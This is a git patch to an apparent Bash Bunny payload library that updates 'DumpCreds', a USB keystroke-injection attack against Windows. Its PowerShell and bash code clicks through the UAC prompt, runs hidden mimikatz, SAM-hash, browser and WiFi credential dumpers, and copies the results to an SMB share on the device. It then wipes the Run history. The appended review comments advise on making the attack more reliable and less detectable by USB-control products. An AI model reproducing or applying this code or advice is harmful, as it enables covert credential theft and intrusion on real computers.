From 2d651c75f025bc1769e8a0298cb547f9a99e6ced Mon Sep 17 00:00:00 2001 From: Baur Date: Sun, 16 Apr 2017 08:03:02 +0200 Subject: [PATCH] Updated DumpCreds for bunny fw v1.1 (#168) * DumpCreds Version 2.1 - new payload.txt special for BashBunny FW 1.1 - minor changes in main.ps1 - insert some code for debugging * Updated because new fork sync * new payload.txt special for BashBunny FW 1.1 + minor changes in main.ps1 + insert some code for debugging --- .../library/credentials/DumpCreds/README.md | 101 +++++++---- .../library/credentials/DumpCreds/main.ps1 | 33 ++-- .../library/credentials/DumpCreds/payload.txt | 170 ++++++++++-------- 3 files changed, 176 insertions(+), 128 deletions(-) diff --git a/payloads/library/credentials/DumpCreds/README.md b/payloads/library/credentials/DumpCreds/README.md index e0d45327..4c374fa3 100644 --- a/payloads/library/credentials/DumpCreds/README.md +++ b/payloads/library/credentials/DumpCreds/README.md
@@ -1,22 +1,34 @@ -# DumpCreds 2.0 +# DumpCreds 2.1 * Author: QDBA -* Version: Version 2.0.2 Build 1003 -* Target: Windows +* Version: Version 2.1.0 Build 1004 +* Target: Windows 10 ## Description +** !!!!! works only at Bash Bunny with FW 1.1 !!!!! ** + Dumps the usernames & plaintext passwords from - - Browsers (Crome, IE, FireFox) - - Wifi - - SAM Hashes (only if AdminMode=True) - - Mimimk@tz Dump (only if AdminMode=True) - - Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) + * Browsers (Crome, IE, FireFox) + * Wifi + * SAM Hashes (only if AdminMode=True) + * Mimimk@tz Dump (only if AdminMode=True) + * Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) without - - Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) - - Internet connection (becaus Firewall ContentFilter Blocks the download sites) + * Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) + * Internet connection (becaus Firewall ContentFilter Blocks the download sites) + + +# Problems +- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded. +- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times) +- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out. + If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue) + +# Debug +If you want some debug information, create a file with name "DEBUG" in the payload folder +you got the debug information in \loot\DumpCred_2.1\log.txt Folder - ## Configuration 
@@ -24,11 +36,6 @@ None needed. ## Requirements -Impacket must be installed. -Install it from tools_installer payload - -https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer - ## Download 
@@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred ## Install -Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory. +1. Put Bash Bunny in arming mode + +2. Coppy All Folders into the root of Bunny Flash Drive + Mandatory + * payloads/library/DumpCreds_2.1 --> the payload Files + * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload + * tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed) + Not neccessary + * docs --> this doc file + * languages --> languauge files for DUCKY_LANG + +3. eject Bash Bunny safely!! + +4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed ) + +5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2 + +6. eject Bash Bunny safely + +7. move switch in right position + +8. plugin Bash Bunny and have fun....! :-) + ## STATUS -| LED | Status | -| ------------------ | -------------------------------------------- | -| White | Give drivers some time for installation | -| Red Blink Fast | Impacket not found | -| Red Blink Slow | Target did not acquire IP address | -| Amber Blink Fast | Initialization | -| Amber | HID Stage | -| Purple Blink Fast | Wait for IP coming up | -| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) | -| Purple / Amber | Powershell scripts running | -| RED | Error in Powershell Scripts | -| Green | Finished | -| ------------------ | -------------------------------------------- | +| LED | Status | +| ----------------------- | -------------------------------------------- | +| Magenta Solid | Setup | +| Red slow blink | Impacket not found | +| Red fast blink | Target did not acquire IP address | +| Yellow single blink | Initialization | +| Yellow double blink | HID Stage | +| Yellow triple blink | Wait for IP coming up | +| Yellow quad blink | Wait for Handshake 
(SMBServer Coming up) | +| Yellow very fast blink | Powershell scripts running | +| White fast blink | Cleanup, copy Files to /loot | +| Green | Finished | +| ----------------------- | -------------------------------------------- | ## Discussion @@ -67,13 +96,7 @@ to......  https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1 +## Changelog -## ToDo - -- paralellize Creds gathering with PS -- check -- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target. - (Not very useful at ths time because I'm still Admin on Computer) -- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future) -- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check - (There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt) -- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain \ No newline at end of file +- Complete new payload.txt code for BashBunny 1.1 +- Added a lot of debug cod into the payload diff --git a/payloads/library/credentials/DumpCreds/main.ps1 b/payloads/library/credentials/DumpCreds/main.ps1 index b68f2ecb..9428213b 100644 --- a/payloads/library/credentials/DumpCreds/main.ps1 +++ b/payloads/library/credentials/DumpCreds/main.ps1 @@ -1,7 +1,7 @@  <# .SYNOPSIS - DumpCred 2.0 + DumpCred 2.1 .DESCRIPTION Dumps all Creds from a PC .PARAMETER @@ -10,8 +10,8 @@ DumpCred #> -$_Version = "2.0.2" -$_BUILD = "1003" +$_Version = "2.1.0" +$_BUILD = "1004" # Share on bashbunny $SHARE="\\172.16.64.1\e" 
@@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE Stop-Job * Remove-Job * -# Start all Jobs as background jobs -Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null -Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null -Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null -Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null -Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null +Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null +Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null if ($isAdmin) { - Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass 
$SHARE\PS\Invoke-PowerDump.ps1} | Out-Null - Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null + Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null + Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null } - +Write-host "... Wait for end of jobs" # Wait for all jobs -Get-Job | Wait-Job | Out-Null +Get-Job | Wait-Job +Write-host "... Receiving results" # Receive all results Get-Job | Receive-Job | Out-File -Append $TMPFILE + #Move TMP File to Bunny +Write-host "Moving file to bunny" move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue # Cleanup # Remove Run History Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue +Write-host "... Rename CON_OK to CON_EOF" # Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF" -# Kill cmd.exe +Write-host "... Kill cmds" +# Kill cmde.exe Stop-Process -name cmd -ErrorAction SilentlyContinue +Write-host "... Remove all Jobs" # Remove all Jobs from Joblist Remove-Job * \ No newline at end of file diff --git a/payloads/library/credentials/DumpCreds/payload.txt b/payloads/library/credentials/DumpCreds/payload.txt index c9d3afbc..7126135f 100644 --- a/payloads/library/credentials/DumpCreds/payload.txt +++ b/payloads/library/credentials/DumpCreds/payload.txt 
@@ -1,80 +1,85 @@ #!/bin/bash # -# Title: DumpCreds 2.0 +# Title: DumpCreds 2.1 # Author: QDBA -# Version: 2.0.2 -# Build: 1001 +# Version: 2.1.0 +# Build: 1004 # Category: Exfiltration -# Target: Windows Windows 7 + 10 (Powershell) -# Attackmodes: HID, Ethernet +# Target: Windows Windows 10 (Powershell) +# Attackmodes: HID, Ethernet +# !!! works only with Bash Bunny FW 1.1 and up !!! # # -# White................Wait for driver installation -# Red Blink Fast.......Impacket not found -# Red Blink Slow.......Target did not acquire IP address -# Amber Blink Fast.....Initialization -# Amber................HID Stage -# Purple Blink Fast....Wait for IP coming up -# Purple Blink Slow....Wait for Handshake (SMB Server Coming up) -# Purple / Amber ......Powershell scripts running -# RED..................Error in Powershell scripts -# Green................Finished -# -# OPTIONS +# LED Status +# ----------------------- + -------------------------------------------- +# SETUP + Setup +# FAIL + No /tools/impacket/examples/smbserver.py found +# FAIL2 + Target did not acquire IP address +# Yellow single blink + Initialization +# Yellow double blink + HID Stage +# Yellow triple blink + Wait for IP coming up +# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) +# Cyan inv quint blink + Powershell scripts running +# White fast blink + Cleanup, copy Files to /loot +# Green + Finished +# ----------------------- + -------------------------------------------- + +logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################" + + +###### Lets Start #### +LED SETUP -# Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh # Some Variables SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot -mkdir -p $LOOTDIR >/dev/null - -# Initialization -LED R G 100 - - -# Check for impacket. If not found, blink fast red. -if [ ! 
-f pentest/impacket/examples/smbserver.py ]; then - LED R 100 - exit 1 +# if the file DEBUG in payload folder exist, enter debug mode +if [ -f $SWITCHDIR/DEBUG ];then + DEBUG=1 # 1= Debug on / 0= Debug off + tail -f /var/log/syslog > /tmp/log.txt & +else + DEBUG=0 fi +mkdir -p $LOOTDIR + +REQUIRETOOL impacket + # remove old Handshake Files rm -f $SWITCHDIR/CON_* - # HID STAGE # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. -LED R G B +logger -t DumpCred_2.1 "### Enter HID Stage ###" +LED STAGE1 ATTACKMODE HID -Q SET_LANGUAGE DE +export DUCKY_LANG=de -# Give some time for driver installation -Q DELAY 25000 +Q DELAY 5000 -LED R G 100 # Launch initial cmd -Q GUI r +if [ $DEBUG -eq 1 ]; then + RUN WIN cmd +else + RUN WIN cmd /k mode con lines=1 cols=100 +fi + +# Launch powershell as admin (red window) Q DELAY 1000 -Q STRING cmd /k mode con lines=1 cols=180 +if [ $DEBUG -eq 1 ]; then + Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs" +else + Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs" +fi Q DELAY 500 Q ENTER -# Launch powershell as admin and deletes Run history -#Q GUI r -Q DELAY 1000 -#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs" -Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs" -Q DELAY 500 -Q ENTER - -# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o -# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o - +# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel) + # With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. 
The ALT n goes to this Window (doesn't matter) than Enter for Newline # now the second powershell command goes to the admin cmd windows. 
@@ -90,59 +95,74 @@ Q ALT n Q DELAY 500 Q ENTER -LED R G +LED STAGE2 # Wait for Bunny Ethernet and Start main.ps1 Powershell Script Q DELAY 500 -Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" +if [ $DEBUG -eq 1 ]; then + Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\"" +else + Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" +fi Q DELAY 1000 Q ENTER - +logger -t DumpCred_2.1 "### Enter Ethernet Stage ###" # Ethernet Tage -LED R B 1 +LED STAGE3 ATTACKMODE RNDIS_ETHERNET # Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh - +logger -t DumpCred_2.1 "### Start SMBServer ###" # Start SMB Server -/pentest/impacket/examples/smbserver.py e $SWITCHDIR & +/tools/impacket/examples/smbserver.py e $SWITCHDIR & # Give target a chance to start exfiltration sleep 2 -# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk - - - +GET TARGET_IP # Check target IP address. If unset, blink slow red. if [ -z "${TARGET_IP}" ]; then - LED R 1000 - exit 1 + LED FAIL2 + logger -t DumpCred_2.1 "### No Target_IP ###" + logger -t DumpCred_2.1 "### Failed ###" + exit fi +logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###" -LED R B 1000 +LED STAGE4 # Handshake Bunny and Computer while ! [ -f $SWITCHDIR/CON_REQ ]; do + logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###" sleep 1 done mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK -LED R B +LED Y VERYFAST # Wait until CON_EOF - Computer set it if all is ready while ! 
[ -f $SWITCHDIR/CON_EOF ]; do - LED R B - sleep 1 - LED R G - sleep 1 - if [ -f $SWITCHDIR/CON_ERR ]; then - rm $SWITCHDIR/CON_ERR - LED R - exit 2 - fi + logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###" + sleep 2 done -rm $SWITCHDIR/CON_EOF -sync; sleep 1; sync -LED G +LED CLEANUP +# Cleanup +logger -t DumpCred_2.1 "### cleanup and copy files ###" +if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then + mkdir -p /root/udisk/loot/DumpCred_2.1 +fi +mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 +rmdir $LOOTDIR +rm -f $SWITCHDIR/CON_EOF + +logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################" + +# realy the end.... +if [ $DEBUG -eq 1 ]; then + killall tail + cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/ +fi + +ATTACKMODE RNDIS_ETHERNET STORAGE +sync; sleep 1; sync +LED FINISH \ No newline at end of file
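Review bot: the first README hunk (`@@ -1,22 +1,34 @@`) states the payload "works only at Bash Bunny with FW 1.1", while the payload.txt header in this same patch says "works only with Bash Bunny FW 1.1 and up"; pick one wording so users on later firmware know whether it is expected to run. The same hunk narrows Target from "Windows" to "Windows 10", but nothing in main.ps1 or payload.txt shows what stops working on Windows 7, so either keep the previous target or add the reason to the new Problems section.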
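Review bot: the Requirements hunk (`@@ -24,11 +36,6 @@`) deletes the Impacket requirement and its tools_installer link but leaves an empty `## Requirements` heading directly above `## Download`, while payload.txt still calls `REQUIRETOOL impacket` and starts `/tools/impacket/examples/smbserver.py`. Either drop the empty heading or restate the dependency there (Impacket under `/tools`, installed by inserting the Bunny in arming mode as step 4 of the new Install section describes) so the reader sees it before the install steps.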
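Review bot: the Install/STATUS hunk (`@@ -38,23 +45,45 @@`) tells users to copy `payloads/library/DumpCreds_2.1`, but the files in this patch live under `payloads/library/credentials/DumpCreds`, and the unchanged Download line above still links `.../payloads/library/DumpCred`; three names for one directory will send people to the wrong folder, so use the real repo path in steps 2 and 5. The STATUS table in the same hunk also disagrees with payload.txt: it lists "Yellow quad blink" for the handshake wait and "Yellow very fast blink" for the PowerShell stage, whereas the payload.txt header lists "Cyan inv single blink" and "Cyan inv quint blink" for those states and the code actually runs `LED STAGE4` and `LED Y VERYFAST`. Keep one source of truth (the LED calls) and derive both tables from it. Minor: "Coppy", "neccessary" and "languauge" are misspelled.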
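Review bot: the changelog hunk (`@@ -67,13 +96,7 @@`) says only "Complete new payload.txt code" and omits the main.ps1 change most likely to break a fresh install: the mimikatz job now launches `$SHARE\PS\invoke-m1m1d0gz.ps1` instead of `Invoke-M1m1k@tz.ps1`, yet the unchanged attribution line just above still names Invoke-M1m1k@tz.ps1 and no file under PS/ is added or renamed anywhere in this patch. Either include the renamed script and update the attribution line, or revert the filename in main.ps1; also "debug cod" should read "debug code".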
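Review bot: in the main.ps1 hunk (`@@ -70,37 +70,42 @@`) `Get-Job | Wait-Job` still has no `-Timeout`, and the README hunk in this same patch says the firmware stops every payload after 1 min 30 s; if any job (mimikatz or the inventory script) outlives that, main.ps1 never reaches the `Rename-Item` of CON_OK to CON_EOF, the Bunny keeps waiting until the cut-off, and the partial results already in `$TMPFILE` never reach the share. Suggest `Get-Job | Wait-Job -Timeout 60 | Out-Null` sized below the firmware limit, then `Receive-Job` whatever finished and `Stop-Job` the rest before the rename. Two smaller points: `-ErrorAction SilentlyContinue` on `start-job` only suppresses errors from creating the job, not failures inside the child powershell, so it does not report or hide what those scripts do; and dropping `| Out-Null` from `Wait-Job` writes the job objects to the output stream, which in DEBUG mode lands in `%TEMP%\pslog.tmp` ahead of the real results. Typo in the new comment: "# Kill cmde.exe".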
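Review bot: the DEBUG branch of the elevation step in the first payload.txt hunk (`@@ -1,80 +1,85 @@`) is missing a space: `Start-Process cmd -A '/t:4f'-Verb runAs` versus the non-debug `-A '/t:4f /k mode con lines=1 cols=100' -Verb runAs`. In PowerShell argument mode the quoted string and the adjacent `-Verb` fold into one argument, so `-Verb runAs` is not bound as the parameter, the elevated cmd window is not started, and the `ALT j` keystrokes that follow have no UAC prompt to answer in debug mode. The keyboard layout is also now hard-coded as `export DUCKY_LANG=de` with the German UAC keys `ALT j`/`ALT n` a few lines later; since the comment already tells users to change those keys per language, put `DUCKY_LANG` and the two key names in variables next to `SWITCHDIR` at the top. Finally, the driver settle delay drops from `Q DELAY 25000` to `Q DELAY 5000`, which matches the new README item "plug off the BB and try it once more (can take 3 or 4 times)"; either justify 5 s in the README or keep a longer delay for first insertion.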
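Review bot: the second payload.txt hunk (`@@ -90,59 +95,74 @@`) removes the `CON_ERR` check from the CON_EOF loop and both handshake loops are unbounded, so any failure in main.ps1 before the CON_OK to CON_EOF rename leaves the payload on `LED Y VERYFAST` until the firmware's 1 min 30 s cut-off described in the README, with no LED telling the operator what failed and nothing copied out of `$LOOTDIR`. Bound each loop with a counter (the `sleep 2` iterations kept below the firmware limit), fall through to `LED FAIL` plus a `logger` line when it expires, and keep the CON_ERR branch so main.ps1 can still signal an error. Three further items: the DEBUG branch of the `while (1)` launcher drops the trailing `; exit }`, so once main.ps1 returns the loop pings 172.16.64.1 again and relaunches main.ps1 indefinitely; the new final `ATTACKMODE RNDIS_ETHERNET STORAGE` exposes the udisk as USB mass storage on the target, which is exactly what the README's "without Use of USB Storage (because USB Storage is mostly blocked by USBGuard or DriveLock)" claim promises to avoid and will trip those products at the end of an otherwise quiet run; and `smbserver.py` is backgrounded and never killed, so the anonymous `e` share stays up after the loot is moved (a `kill %1` or `pkill -f smbserver.py` belongs in the cleanup block). The comment "# Source bunny_helpers.sh to get environment variables" is stale now that the `source` line beneath it is removed.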